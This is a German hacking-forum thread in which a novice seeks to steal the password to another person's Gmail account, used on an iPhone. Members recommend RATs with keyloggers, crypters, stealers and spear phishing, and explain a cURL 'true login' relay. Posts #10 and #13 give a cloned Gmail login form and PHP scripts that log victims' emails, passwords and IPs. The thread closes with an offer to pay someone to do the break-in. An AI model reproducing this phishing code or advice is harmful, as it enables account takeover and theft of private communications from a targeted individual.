Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

Gmail Acc Passwort knacken

- - - - -

  • Bitte melde dich an um zu Antworten
18 Antworten in diesem Thema

#1
seiko

seiko

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    1
  • 16 Beiträge
  • 1 Bedankt

Guten Abend!

Ich bin neu hier und totaler Anfäger. Aber irgendwann muss man ja mal beginnen. Also ich möchte an das Passwort eines gmail-accounts rankommen. Welches tool sollte ich dafür verwenden? Eine kleine Anleitung und Tipps gegen Anfängerfehler sind natürlich sehr willkommen. Natürlich werd ich zuerst nur an meinen herumprobieren. Danke schon mal!



#2
KrankenHaus

KrankenHaus

    Noob

  • Banned
  • PIPPIP
  • Likes
    2
  • 14 Beiträge
  • 1 Bedankt

Bruteforce könntest du versuchen oder mit ein stealer dein opfer zu Stealen :)



#3
smc2014

smc2014

    Moderator

  • Moderator
  • Likes
    343
  • 576 Beiträge
  • 239 Bedankt
  • Spender
  • Android [root]
  • Windows, Linux

Da du evtl. nicht weisst, ob der baldige VIC überhaupt Daten abspeichert.... (ein Stealer kann nur abgespeicherte Daten "stealen" ;) ) würde ich dir ein RAT empfehlen.

Bevor die nächste Frage kommt, welches oder wo finde ich eines http://www.toolbase.....php/pages/baseklicke oben auf RAT.

 

  • CyberGate
  • Pandora

 

werden am häufigsten benutzt.

Beide haben ein integrierten KeyLogger, d.h. es werden alle Tastatureinschläge aufgenommen (auch Offline).

Probier es mal in einer VM aus.

 

PS: wenn du es anderswo benutzen möchtest, denke daran das du eine "feste IP" brauchst.. hierzu

Please Login HERE or Register HERE to see this link!

 

HF =Have Fun ;)



#4
B1nary

B1nary

    Samurai

  • Elite Member
  • Likes
    489
  • 506 Beiträge
  • 346 Bedankt

Falls dein Vic schwer zu infecten ist, tut's vielleicht auch eine Phishing-Page. Bei Gmail funktioniert auch ein true login via PHP CURL


  • h4ck3rboon gefällt das

Thanked by 1 Member:
h4ck3rboon

#5
FalkE

FalkE

    1337

  • Banned
  • PIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    4
  • 349 Beiträge
  • 79 Bedankt
  • Android [root]
  • Linux

spear phishing



#6
seiko

seiko

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    1
  • 16 Beiträge
  • 1 Bedankt

Danke mal an alle für die Antworten.

Welches tool für bruteforce sollte ich verwenden?

Ich geh davon aus, dass das Passwort abgespeichert ist. Verwendet wird gmail über ein Iphone 5.

Gibt es da auch ein tool für Handys?

Phishing bekomme ich vielleicht hin mit den Anleitungen im Netz. 

Was ist true login via PHP CURL?

Entschuldigung für die laienhaften Fragen!



#7
Cube

Cube

    Würfel

  • Banned
  • PIPPIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    7
  • 819 Beiträge
  • 1062 Bedankt
  • Android, Android [root]
  • Windows, Linux

 

Welches tool für bruteforce sollte ich verwenden?

Ich geh davon aus, dass das Passwort abgespeichert ist. Verwendet wird gmail über ein Iphone 5.

Gibt es da auch ein tool für Handys?

 

Bruteforce würde ich persönlich sein lassen.

Bruteforce gegen google? Und dann auch noch als absoluter Frischling?

Man muss zuerst gehen lernen bevor man laufen kann ;)

 

Das Passwort von einem Smartphone auszulesen ist schon eine deutlich höherer aufwand als von einem PC.

Es gibt Trojaner/Rats für Smartphones, allerdings sind mir persönlich nur welche für Android bekannt.

 

Bin noch nicht über Apple Iphone Rats gestolpert.

Vielleicht kennt allerdings jemanden der eines anbietet.

Allerdings gehe ich dann davon aus, dass das nicht gerade billig sein wird.

Aber auch ich bin nicht all wissend.

 

Deutlich einfacher wäre es, wenn du den Vic PC irgendwie angreifen könntest, in welcher Form auch immer.

 

Lg

Cube


  • Bypass gefällt das

Jabber: cube@exploit.im

Only with OTR!

 

HQ Password-Recovery-Tool (Browser, Mail uvm.): TripleCCC


#8
seiko

seiko

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    1
  • 16 Beiträge
  • 1 Bedankt

 

Allerdings gehe ich dann davon aus, dass das nicht gerade billig sein wird.

 

Eine finanzielle Gegenleistung kann ich natürlich anbieten, wenn sie sich im Rahmen hält und nicht überzogen ist.



#9
B1nary

B1nary

    Samurai

  • Elite Member
  • Likes
    489
  • 506 Beiträge
  • 346 Bedankt

Was ist true login via PHP CURL?

Entschuldigung für die laienhaften Fragen!

 

Kein Problem, dafür ist ein Forum da!

PHP Libcurl ist eine Bibliothek, welche die Verbindung zu Servern (Websites) ermöglicht und somit Protokolle ausgetauscht werden können

Quelle: 

Please Login HERE or Register HERE to see this link!

 

Damit kannst du z.B. einen Login durchführen. Du generierst mit deiner Phishing-Page alle notwendigen Daten (Header, Cookie/Session, etc.) und kannst dich so einloggen (API, OAuth).

 

Phishing-Page -> Daten werden eingegeben -> Daten werden gespeichert/protokolliert -> cURL Request an Gmail mit den eingegebenen Daten -> Login erfolgt  (Vic bekommt i.d.R. nicht mit, dass er abgephished wurde, da der Login vollzogen wurde (true login)) -> Cookie setzen -> Weiterleitung zu Gmail / Refresh


  • SAR, Cube und h4ck3rboon gefällt das

#10
seiko

seiko

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    1
  • 16 Beiträge
  • 1 Bedankt

Also ich will es mit der Phishing-methode probieren. Ich hab mich an dem Tutorial 

http://www.toolbase.bz/board/topic/300-tut-phishing-tutorial-by-paulaabdul-1/

orientiert.

Allerdings steh ich schon am Anfang an. Zuerst der interessante Teil der gmail.html, die ich abgespeichert hab:

 

 

<form novalidate="" method="post" action="login.php" id="gaia_loginform">
  <input name="GALX" type="hidden" value="MlTgl6VfDaE">
  <input name="continue" type="hidden" value="

Please Login HERE or Register HERE to see this link!


  <input name="service" type="hidden" value="mail">
  <input name="hl" type="hidden" value="en">
  <input type="hidden" id="_utf8" name="_utf8" value="☃">
  <input type="hidden" name="bgresponse" id="bgresponse" value="js_disabled">
  <input type="hidden" id="pstMsg" name="pstMsg" value="1">
  <input type="hidden" id="dnConn" name="dnConn" value="">
  <input type="hidden" id="checkConnection" name="checkConnection" value="youtube:128:1">
  <input type="hidden" id="checkedDomains" name="checkedDomains" value="youtube">
<label class="hidden-label" for="Email">Email</label>
<input id="Email" name="Email" type="email" placeholder="Email" value="" spellcheck="false" class="">
<label class="hidden-label" for="Passwd">Password</label>
<input id="Passwd" name="Passwd" type="password" placeholder="Password" class="">
<input id="signIn" name="signIn" class="rc-button rc-button-submit" type="submit" value="Sign in">

 

 

Dann hab ich die Datei login.php erstellet. Die schaut so aus:

 

<?php
$go = fopen("logs","a+");
$timestamp = time();
$datum = date("d.m.Y - H:i:s", $timestamp);
$mail = $_POST["Email"];
$pass = $_POST["Passwd"];
$ip = $_SERVER['REMOTE_ADDR'];
fwrite($go, "Hoster: Google");
fwrite($go, "Datum: " . "$datum n");
fwrite($go, "E-Mail: " . "$mail n");
fwrite($go, "Password: " . "$pass n");
fwrite($go, "Ip: " . "$ip n");
fwrite($go, " n");
fclose($go);
header('Location:

Please Login HERE or Register HERE to see this link!


?>

 

Wenn ich also gmail aufrufe, email und Passwort eingebe und auf sign-in klick, tut sich nur eine leere login.php Seite auf.

Was hab ich falsch gemacht?



Thanked by 1 Member:
mariosgoz

#11
B1nary

B1nary

    Samurai

  • Elite Member
  • Likes
    489
  • 506 Beiträge
  • 346 Bedankt

Wird denn die Datei logs geschrieben?



#12
seiko

seiko

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    1
  • 16 Beiträge
  • 1 Bedankt

Nein.



#13
B1nary

B1nary

    Samurai

  • Elite Member
  • Likes
    489
  • 506 Beiträge
  • 346 Bedankt
<?php
$fp = fopen('logs.txt', 'a+');
$email = $_POST['Email'];
$passwd = $_POST['Passwd'];
$ip = getenv('REMOTE_ADDR');
if (!empty($email) && !empty($passwd)):
	$str = 'Hoster: Google\nDatum: '.date('d.m.Y - H:i:s', time()).'\nE-Mail: '.$email.'\nPasswort: '.$passwd.'\nIP: '.$ip.'\n\n';
	fwrite($fp, trim($str));
	fclose($fp);
endif;
header('Location: google.com');
?>

Ungetestet


  • seiko gefällt das

#14
seiko

seiko

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    1
  • 16 Beiträge
  • 1 Bedankt

Danke!! Ich werd's ausprobieren wenn ich von der Arbeit komm.



#15
seiko

seiko

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    1
  • 16 Beiträge
  • 1 Bedankt

Leider das gleiche Ergebnis. Es kommt eine leere login.php Seite und die Datei logs wird nicht geschrieben.



#16
adramax

adramax

    Leecher

  • Members
  • PIP
  • Likes
    1
  • 1 Beiträge
  • 0 Bedankt

Hast du den CHMOD Rechte vergeben?

 

Wenn die login.php keine Rechte hat in die Datei logs zu schreiben, kann sie dort auch nicht rein schreiben.

 

Aber hab nochmal ne Frage, geht es dir um einen Gmail Account oder darum etwas zu lernen?

Wenn du etwas lernen willst, ist das vermutlich der falsche Weg, dann solltest du dir Bücher kaufen oder im Internet nach E-Books über PHP suchen.



#17
C.I.K

C.I.K

    Noob

  • Members
  • PIPPIP
  • Likes
    0
  • 7 Beiträge
  • 2 Bedankt

Da du evtl. nicht weisst, ob der baldige VIC überhaupt Daten abspeichert.... (ein Stealer kann nur abgespeicherte Daten "stealen" ;) ) würde ich dir ein RAT empfehlen.

Bevor die nächste Frage kommt, welches oder wo finde ich eines http://www.toolbase.....php/pages/baseklicke oben auf RAT.

 

  • CyberGate
  • Pandora

 

werden am häufigsten benutzt.

Beide haben ein integrierten KeyLogger, d.h. es werden alle Tastatureinschläge aufgenommen (auch Offline).

Probier es mal in einer VM aus.

 

PS: wenn du es anderswo benutzen möchtest, denke daran das du eine "feste IP" brauchst.. hierzu

Please Login HERE or Register HERE to see this link!

 

HF =Have Fun ;)

Dieser User hat dir eingentlich alles geliefert was du brauchst.

Was noch fehlt ist ein Crypter und kannst es versuchen.

Wird das leichtest sein.



#18
seiko

seiko

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    1
  • 16 Beiträge
  • 1 Bedankt

Der VIC verwendet gmail über ein iPhone. Ein User hat erwähnt, dass es keinen RAT gibt für iPhone.

 

Primär geht es mir natürlich um den account. Wenn ich aber nebenbei was dazu lerne, ist es ja auch nicht verkehrt.



#19
seiko

seiko

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    1
  • 16 Beiträge
  • 1 Bedankt

Ich meld mich nochmal. Also ich geb's auf. Gibt es jemandem, der sich das zutraut.

Ich würde natürlich dafür bezahlen, wenn's nicht zu unverschämt ist.

Voraussetzung ist natürlich DISKRETION!





  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 102 user(s)


    , .:dodo:., adn1337, adramax, AnonymES, B1nary, bebekid32, Bl4ck3d, Blackhook, BlackZetsu, blue_eyed_devil, Bobbi, breidi59, brillant, BYk, Bypass, C.I.K, Caruso, caspR, confick.ini, cooky1, corkscrew, Crap, Cube, CyberFlash, darkman36, DonArox, Dr. Spic, DR.zydz, easysurfer, eckhau, Eester, Emalik Xantier, EviLByteS, eXalT, FalkE, Framerater, frechdax, FredVomJupiter, G0rki, ghost12, gtawelt, h4ck3rboon, Heinokel0903, holz96, Husti_nett, Irhabi, jabba, jnxz, JonyD, Juri, keyb0ardz, kHAZYY, KrankenHaus, LexXsusS, lHamzeh, LiquidBlue, lolonice, lolorollo, Mantrayana, mariosgoz, mettbrot, Miyaca, most_uniQue, Mr_NiceGuy, Neonxen, nibble nibble, notfound, paulaner, pdr0, PHIPU, polso, psner, PyTh@n, R3s1stanc3, redflag, Rumpelstielzchen2.0, saboa, SAR, SavE1, saxxcxc, seiko, Seldos, SheeqZ, Slavio69, smc2014, Smokyjoe, Stech3r, subsubsub, TheAvenger, Toskom4n, UDXR, Unkiii, ValleX, VeqasZ, VIP3R, wbx32, White-Warti, x64ktg, Xenio, xrahitel, Zero-X
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.